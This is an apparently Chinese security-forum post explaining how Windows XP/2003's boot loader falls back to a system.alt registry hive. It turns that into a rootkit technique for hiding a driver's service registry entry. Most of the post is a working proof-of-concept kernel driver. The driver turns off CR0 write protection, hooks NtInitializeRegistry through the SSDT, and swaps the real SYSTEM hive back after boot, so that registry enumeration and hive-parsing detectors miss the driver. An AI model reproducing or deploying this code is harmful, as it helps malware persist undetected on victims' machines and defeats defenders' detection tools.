几个月前,我曾在某些帖子谈论过这个技术
现在六一节到了,为了满足广大饥渴的小朋友们,特此放出
=====================================================
Mark在Windows Internals 4th(p 210)中提到过,WIN2000下,为了保持系统HIVE的完整性,系统在刷新SYSTEM HIVE的同时,会刷新一个名为“替补储巢”的hive :System.alt
当系统储巢System已经损坏,无法加载时,就会选择这个替补储巢system.alt来加载.这是由于win2000的ntldr不知道如何使用储巢日志文件(system.log)来进行储巢修复导致的,Mark称windows XP以后的系统已经抛弃了这一机制
但事实如何呢?首先我们来看一下某份NT4的代码:
下面这个函数是BootLoader(ntldr)用来加载系统HIVE的函数:
代码:
ARC_STATUS
BlLoadAndScanSystemHive(
IN ULONG DeviceId,
IN PCHAR DeviceName,
IN PCHAR DirectoryPath,
IN PWSTR BootFileSystem,
OUT PCHAR BadFileName
)
...................
省略无关部分
.....................
strcpy(Directory,DirectoryPath);
strcat(Directory,"\\system32\\config\\");
Status = BlLoadAndInitSystemHive(DeviceId,
DeviceName,
Directory,
"system",
FALSE,
&RestartSetup);
if(Status != ESUCCESS) {
//
// bogus hive, try system.alt
//
Status = BlLoadAndInitSystemHive(DeviceId,
DeviceName,
Directory,
"system.alt",
TRUE,
&RestartSetup);
if(Status != ESUCCESS) {
strcpy(BadFileName,DirectoryPath);
strcat(BadFileName,"\\SYSTEM32\\CONFIG\\SYSTEM");
goto HiveScanFailed;
}
}
事实上,这部分代码一直保留在WINDOWS XP和WINDOWS 2003中,直到VISTA中才去除掉,VISTA系统中已更改为仅加载SYSTEM储巢,如果SYSTEM储巢加载失败,直接拒绝继续启动。
但是,这里只是NTLDR加载的储巢,这些储巢在系统启动后会被丢弃(保存在BootLoaderBlock中)
SMSS将调用SSDT中的NtInitializeRegistry函数,通过CmpCmdInit->CmpInitializeHiveList,通过CmpLoadHiveThread系统线程为CmpMachineHiveList中的每个系统储巢做加载和初始化工作
这里系统只识别\SystemRoot\System32\Config\System储巢,如果无法加载这个储巢,系统将调用KeBugCheckEx使系统蓝屏,蓝屏代码为STATUS_CANNOT_LOAD_REGISTRY_FILE
有了上面的知识,我们很容易便可知道如何隐藏一个注册表了:
只要我们将当前SYSTEM储巢删除或者使其无法正确识别,然后在config目录下保留包含了我们的驱动服务项的SYSTEM.ALT储巢,此时重启系统,NTLDR会使用我们的SYETEM.ALT储巢,于是会加载我们的驱动程序
我们在驱动中,HOOK NtInitializeRegistry函数,等待NT内核再次初始化系统储巢,等到后,我们将SYSTEM储巢恢复(move file / fix file /redir file...),此时系统就能正常引导了
但是此时系统加载的是不包含我们的驱动服务项的储巢,所以任何利用正常、非正常枚举手法进行的检测,都检测不到我们的驱动注册表。无论是还原nt*key函数进行枚举,还是使用cm*key进行枚举,还是使用所谓的Hive解析技术进行枚举。
下面是一个这个驱动的小POC,代码如下:
代码:
#include "ntddk.h"
#include "ntifs_48.h"
#include "zwfunc.h"
#include "stdafx.h"
#define MYDEBUG 1
#if MYDEBUG
#define KDMSG(_x_) DbgPrint _x_
#else
#define KDMSG(_x_)
#endif
ULONG OldNtInitializeRegistry =0;
BOOL SystemHiveIsBuild = FALSE ;
const WCHAR RealSystemHiveLocation[] = L"\\SystemRoot\\System32\\Config\\SYSTEM";
NTSTATUS NewNtInitializeRegistry(USHORT BootCondition)
{
NTSTATUS stat ;
HANDLE hfile ;
IO_STATUS_BLOCK iosb ;
OBJECT_ATTRIBUTES oba ;
UNICODE_STRING FileName ;
UNICODE_STRING SystemSave ;
KDMSG(("NtInitializeRegistry is call!"));
if (SystemHiveIsBuild == FALSE)
{
RtlInitUnicodeString(&FileName , RealSystemHiveLocation);
InitializeObjectAttributes(&oba , &FileName , OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE , 0 , 0 );
stat = IoCreateFile(&hfile ,
FILE_ALL_ACCESS ,
&oba ,
&iosb,
NULL,
FILE_ATTRIBUTE_NORMAL ,
FILE_SHARE_READ | FILE_SHARE_WRITE ,
FILE_OPEN ,
FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT ,
NULL,
0,
CreateFileTypeNone ,
0,
IO_NO_PARAMETER_CHECKING);
KDMSG(("open config\\system return %08x\n",stat));
if (!NT_SUCCESS(stat))
{
if (stat != STATUS_OBJECT_NAME_NOT_FOUND && stat != STATUS_OBJECT_PATH_NOT_FOUND)
{
goto end ;
}
}
else
{
ZwClose(hfile);
goto end ;
}
//now system hive is not found
//move file
{
PFILE_RENAME_INFORMATION renameinfo ;
renameinfo = (PFILE_RENAME_INFORMATION)ExAllocatePool(NonPagedPool , sizeof(FILE_RENAME_INFORMATION) + sizeof(RealSystemHiveLocation) - sizeof(WCHAR));
renameinfo->FileNameLength = sizeof(RealSystemHiveLocation) - sizeof(WCHAR);
renameinfo->ReplaceIfExists = TRUE ;
renameinfo->RootDirectory = 0 ;
RtlCopyMemory((PVOID)renameinfo->FileName, (PVOID)RealSystemHiveLocation , sizeof(RealSystemHiveLocation));
RtlInitUnicodeString(&FileName , L"\\SystemRoot\\System32\\SYSTEM");
InitializeObjectAttributes(&oba , &FileName , OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE , 0 , 0 );
stat = IoCreateFile(&hfile ,
FILE_ALL_ACCESS ,
&oba ,
&iosb,
NULL,
FILE_ATTRIBUTE_NORMAL ,
FILE_SHARE_READ | FILE_SHARE_WRITE ,
FILE_OPEN,
FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT ,
NULL,
0,
CreateFileTypeNone ,
0,
IO_NO_PARAMETER_CHECKING);
KDMSG(("open system\\system return %08x\n" , stat));
if (!NT_SUCCESS(stat))
{
ExFreePool(renameinfo);
goto end ;
}
stat = ZwSetInformationFile(hfile ,
&iosb ,
renameinfo ,
sizeof(FILE_RENAME_INFORMATION) + sizeof(RealSystemHiveLocation) - sizeof(WCHAR) ,
FileRenameInformation);
KDMSG(("rename file return %08x\n" , stat));
ZwClose(hfile);
SystemHiveIsBuild = TRUE ;
}
}
end:
__asm
{
movzx eax , BootCondition
push eax
call OldNtInitializeRegistry
mov stat ,eax
}
return stat ;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT Drvobj , PUNICODE_STRING RegistryPath)
{
ULONG OldCr0 ;
//drv load, hook NtInitializeRegistry
//IN WINDOWS XP , index of ZwInitializeRegistry is 0x5c
__asm{
push eax
push ebx
cli
mov eax , cr0
mov OldCr0 , eax
and eax , 0xFFFEFFFF
mov cr0 , eax
mov eax ,dword ptr[KeServiceDescriptorTable]
mov eax , dword ptr[eax]
//get service base
mov ebx , dword ptr[eax + 0x5c * 4]
mov OldNtInitializeRegistry , ebx
mov ebx , NewNtInitializeRegistry
mov dword ptr[eax + 0x5c * 4] , ebx
mov eax , OldCr0
mov cr0 , eax
sti
pop ebx
pop eax
}
return STATUS_SUCCESS ;
}
当然,这只是一个技巧,但是反映了一些思想:
1.所谓绕过检查,就是要让系统在某一时刻认为你是存在的,而某一时刻认为你是不存在的,利用信息的不对称来使检查失效
2.NTLDR和NTOSKRNL之间,也算是一种信息不对称,例如TOPHET,例如本篇这个技巧,都是利用NTLDR中缺少某种机制,而NTOSKRNL中存在这种机制,由于NTLDR缺少这种机制(例如TOPHET中,访问SCSI驱动器的机制),那么自然给了攻击者可趁之机
当然,微软在VISTA中大大弥补了这些不对称,但是可想而知,还是有更多的未知等着大家去探索。